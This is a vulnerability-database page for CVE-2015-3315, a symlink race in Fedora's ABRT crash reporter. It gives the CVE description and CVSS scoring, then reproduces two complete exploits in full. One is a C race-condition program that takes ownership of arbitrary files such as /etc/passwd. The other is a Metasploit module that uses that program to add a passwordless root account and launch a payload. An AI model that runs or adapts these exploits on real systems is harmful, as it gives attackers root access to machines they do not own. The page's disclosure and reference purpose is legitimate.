CVE-2015-3315 Detail

CVE-2015-3315

Score / Severity

7.8

High

OWSAP

A01-Broken Access Control

EPSS

0.08%V3

Vector

Local

Published

2017-06-26
13h00 +00:00

Modified

2018-02-18
09h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

Automatic Bug Reporting Tool (ABRT) allows local users to read, change the ownership of, or have other unspecified impact on arbitrary files via a symlink attack on (1) /var/tmp/abrt/*/maps, (2) /tmp/jvm-*/hs_error.log, (3) /proc/*/exe, (4) /etc/os-release in a chroot, or (5) an unspecified root directory related to librpm.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-59	Improper Link Resolution Before File Access ('Link Following') The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V3.0	7.8	HIGH	CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H More informations Base: Exploitabilty Metrics The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. Local A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file. Attack Complexity This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. Low Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. Low The attacker is authorized with (i.e. requires) privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges may have the ability to cause an impact only to non-sensitive resources. User Interaction This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component. None The vulnerable system can be exploited without interaction from any user. Base: Scope Metrics An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. Scope Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports. Unchanged An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same. Base: Impact Metrics The Impact metrics refer to the properties of the impacted component. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. High There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. High There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. High There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal Metrics The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability. Environmental Metrics	[email protected]
V2	7.2		AV:L/AC:L/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 36747

Publication date : 2015-04-13 22h00 +00:00
Author : Tavis Ormandy
EDB Verified : Yes

#include <stdlib.h> #include <unistd.h> #include <stdbool.h> #include <stdio.h> #include <signal.h> #include <err.h> #include <string.h> #include <alloca.h> #include <limits.h> #include <sys/inotify.h> #include <sys/prctl.h> #include <sys/types.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/stat.h> // // This is a race condition exploit for CVE-2015-1862, targeting Fedora. // // Note: It can take a few minutes to win the race condition. // // -- [email protected], April 2015. // // $ cat /etc/fedora-release // Fedora release 21 (Twenty One) // $ ./a.out /etc/passwd // [ wait a few minutes ] // Detected ccpp-2015-04-13-21:54:43-14183.new, attempting to race... // Didn't win, trying again! // Detected ccpp-2015-04-13-21:54:43-14186.new, attempting to race... // Didn't win, trying again! // Detected ccpp-2015-04-13-21:54:43-14191.new, attempting to race... // Didn't win, trying again! // Detected ccpp-2015-04-13-21:54:43-14195.new, attempting to race... // Didn't win, trying again! // Detected ccpp-2015-04-13-21:54:43-14198.new, attempting to race... // Exploit successful... // -rw-r--r--. 1 taviso abrt 1751 Sep 26 2014 /etc/passwd // static const char kAbrtPrefix[] = "/var/tmp/abrt/"; static const size_t kMaxEventBuf = 8192; static const size_t kUnlinkAttempts = 8192 * 2; static const int kCrashDelay = 10000; static pid_t create_abrt_events(const char *name); int main(int argc, char **argv) { int fd, i; int watch; pid_t child; struct stat statbuf; struct inotify_event *ev; char *eventbuf = alloca(kMaxEventBuf); ssize_t size; // First argument is the filename user wants us to chown(). if (argc != 2) { errx(EXIT_FAILURE, "please specify filename to chown (e.g. /etc/passwd)"); } // This is required as we need to make different comm names to avoid // triggering abrt rate limiting, so we fork()/execve() different names. if (strcmp(argv[1], "crash") == 0) { __builtin_trap(); } // Setup inotify, and add a watch on the abrt directory. if ((fd = inotify_init()) < 0) { err(EXIT_FAILURE, "unable to initialize inotify"); } if ((watch = inotify_add_watch(fd, kAbrtPrefix, IN_CREATE)) < 0) { err(EXIT_FAILURE, "failed to create new watch descriptor"); } // Start causing crashes so that abrt generates reports. if ((child = create_abrt_events(*argv)) == -1) { err(EXIT_FAILURE, "failed to generate abrt reports"); } // Now start processing inotify events. while ((size = read(fd, eventbuf, kMaxEventBuf)) > 0) { // We can receive multiple events per read, so check each one. for (ev = eventbuf; ev < eventbuf + size; ev = &ev->name[ev->len]) { char dirname[NAME_MAX]; char mapsname[NAME_MAX]; char command[1024]; // If this is a new ccpp report, we can start trying to race it. if (strncmp(ev->name, "ccpp", 4) != 0) { continue; } // Construct pathnames. strncpy(dirname, kAbrtPrefix, sizeof dirname); strncat(dirname, ev->name, sizeof dirname); strncpy(mapsname, dirname, sizeof dirname); strncat(mapsname, "/maps", sizeof mapsname); fprintf(stderr, "Detected %s, attempting to race...\n", ev->name); // Check if we need to wait for the next event or not. while (access(dirname, F_OK) == 0) { for (i = 0; i < kUnlinkAttempts; i++) { // We need to unlink() and symlink() the file to win. if (unlink(mapsname) != 0) { continue; } // We won the first race, now attempt to win the // second race.... if (symlink(argv[1], mapsname) != 0) { break; } // This looks good, but doesn't mean we won, it's possible // chown() might have happened while the file was unlinked. // // Give it a few microseconds to run chown()...just in case // we did win. usleep(10); if (stat(argv[1], &statbuf) != 0) { errx(EXIT_FAILURE, "unable to stat target file %s", argv[1]); } if (statbuf.st_uid != getuid()) { break; } fprintf(stderr, "\tExploit successful...\n"); // We're the new owner, run ls -l to show user. sprintf(command, "ls -l %s", argv[1]); system(command); return EXIT_SUCCESS; } } fprintf(stderr, "\tDidn't win, trying again!\n"); } } err(EXIT_FAILURE, "failed to read inotify event"); } // This routine attempts to generate new abrt events. We can't just crash, // because abrt sanely tries to rate limit report creation, so we need a new // comm name for each crash. static pid_t create_abrt_events(const char *name) { char *newname; int status; pid_t child, pid; // Create a child process to generate events. if ((child = fork()) != 0) return child; // Make sure we stop when parent dies. prctl(PR_SET_PDEATHSIG, SIGKILL); while (true) { // Choose a new unused filename newname = tmpnam(0); // Make sure we're not too fast. usleep(kCrashDelay); // Create a new crashing subprocess. if ((pid = fork()) == 0) { if (link(name, newname) != 0) { err(EXIT_FAILURE, "failed to create a new exename"); } // Execute crashing process. execl(newname, newname, "crash", NULL); // This should always work. err(EXIT_FAILURE, "unexpected execve failure"); } // Reap crashed subprocess. if (waitpid(pid, &status, 0) != pid) { err(EXIT_FAILURE, "waitpid failure"); } // Clean up the temporary name. if (unlink(newname) != 0) { err(EXIT_FAILURE, "failed to clean up"); } // Make sure it crashed as expected. if (!WIFSIGNALED(status)) { errx(EXIT_FAILURE, "something went wrong"); } } return child; }

Exploit Database EDB-ID : 44097

Publication date : 2018-02-15 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ABRT raceabrt Privilege Escalation', 'Description' => %q{ This module attempts to gain root privileges on Fedora systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler. A race condition allows local users to change ownership of arbitrary files (CVE-2015-3315). This module uses a symlink attack on '/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd, then adds a new user with UID=0 GID=0 to gain root privileges. Winning the race could take a few minutes. This module has been tested successfully on ABRT packaged version 2.1.5-1.fc19 on Fedora Desktop 19 x86_64, 2.2.1-1.fc19 on Fedora Desktop 19 x86_64 and 2.2.2-2.fc20 on Fedora Desktop 20 x86_64. Fedora 21 and Red Hat 7 systems are reportedly affected, but untested. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tavis Ormandy', # Discovery and C exploit 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit ], 'DisclosureDate' => 'Apr 14 2015', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'References' => [ [ 'CVE', '2015-3315' ], [ 'EDB', '36747' ], [ 'BID', '75117' ], [ 'URL', 'https://gist.github.com/taviso/fe359006836d6cd1091e' ], [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ], [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/16/12' ], [ 'URL', 'https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92' ], [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-1862' ], [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-3315' ], [ 'URL', 'https://access.redhat.com/articles/1415483' ], [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ], [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ], [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1218239' ] ] )) register_options( [ OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '900' ]), OptString.new('USERNAME', [ false, 'Username of new UID=0 user (default: random)', '' ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ]) end def base_dir datastore['WritableDir'] end def timeout datastore['TIMEOUT'] end def check if cmd_exec('lsattr /etc/passwd').include? 'i' vprint_error 'File /etc/passwd is immutable' return CheckCode::Safe end kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern' unless kernel_core_pattern.include? 'abrt-hook-ccpp' vprint_error 'System is NOT configured to use ABRT for crash reporting' return CheckCode::Safe end vprint_good 'System is configured to use ABRT for crash reporting' if cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true' vprint_error "Directory '/var/spool/abrt' exists. System has been patched." return CheckCode::Safe end vprint_good 'System does not appear to have been patched' unless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true' vprint_error "Directory '/var/tmp/abrt' does NOT exist" return CheckCode::Safe end vprint_good "Directory '/var/tmp/abrt' exists" if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive' vprint_error 'abrt-ccp service NOT running' return CheckCode::Safe end vprint_good 'abrt-ccpp service is running' abrt_version = cmd_exec('yum list installed abrt | grep abrt').split(/\s+/)[1] unless abrt_version.blank? vprint_status "System is using ABRT package version #{abrt_version}" end CheckCode::Detected end def upload_and_chmodx(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data cmd_exec "chmod +x '#{path}'" register_file_for_cleanup path end def exploit if check != CheckCode::Detected fail_with Failure::NotVulnerable, 'Target is not vulnerable' end @chown_file = '/etc/passwd' if datastore['USERNAME'].blank? @username = rand_text_alpha rand(7..10) else @username = datastore['USERNAME'] end # Upload Tavis Ormandy's raceabrt exploit: # - https://www.exploit-db.com/exploits/36747/ # Cross-compiled with: # - i486-linux-musl-cc -static raceabrt.c path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-3315', 'raceabrt' fd = ::File.open path, 'rb' executable_data = fd.read fd.stat.size fd.close executable_name = ".#{rand_text_alphanumeric rand(5..10)}" executable_path = "#{base_dir}/#{executable_name}" upload_and_chmodx executable_path, executable_data # Change working directory to base_dir cmd_exec "cd '#{base_dir}'" # Launch raceabrt executable print_status "Trying to own '#{@chown_file}' - This might take a few minutes (Timeout: #{timeout}s) ..." output = cmd_exec "#{executable_path} #{@chown_file}", nil, timeout output.each_line { |line| vprint_status line.chomp } # Check if we own /etc/passwd unless cmd_exec("[ -w #{@chown_file} ] && echo true").include? 'true' fail_with Failure::Unknown, "Failed to own '#{@chown_file}'" end print_good "Success! '#{@chown_file}' is writable" # Add new user with no password print_status "Adding #{@username} user to #{@chown_file} ..." cmd_exec "echo '#{@username}::0:0::/root:/bin/bash' >> #{@chown_file}" # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" upload_and_chmodx payload_path, generate_payload_exe # Execute payload executable vprint_status 'Executing payload...' cmd_exec "/bin/bash -c \"echo #{payload_path} | su - #{@username}&\"" end def on_new_session(session) if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' end # Reinstate /etc/passwd root ownership and remove new user root_owns_passwd = false new_user_removed = false if session.type.to_s.eql? 'meterpreter' # Reinstate /etc/passwd root ownership session.sys.process.execute '/bin/sh', "-c \"chown root:root #{@chown_file}\"" # Remove new user session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\"" # Wait for clean up Rex.sleep 5 # Check root ownership passwd_stat = session.fs.file.stat(@chown_file).stathash if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0 root_owns_passwd = true end # Check for new user in /etc/passwd passwd_contents = session.fs.file.open(@chown_file).read.to_s unless passwd_contents.include? "#{@username}:" new_user_removed = true end elsif session.type.to_s.eql? 'shell' # Reinstate /etc/passwd root ownership session.shell_command_token "chown root:root #{@chown_file}" # Remove new user session.shell_command_token "sed -i 's/^#{@username}:.*$//g' #{@chown_file}" # Check root ownership passwd_owner = session.shell_command_token "ls -l #{@chown_file}" if passwd_owner.to_s.include? 'root' root_owns_passwd = true end # Check for new user in /etc/passwd passwd_user = session.shell_command_token "grep '#{@username}:' #{@chown_file}" unless passwd_user.to_s.include? "#{@username}:" new_user_removed = true end end unless root_owns_passwd print_warning "Could not reinstate root ownership of #{@chown_file}" end unless new_user_removed print_warning "Could not remove user '#{@username}' from #{@chown_file}" end rescue => e print_error "Error during cleanup: #{e.message}" ensure super end end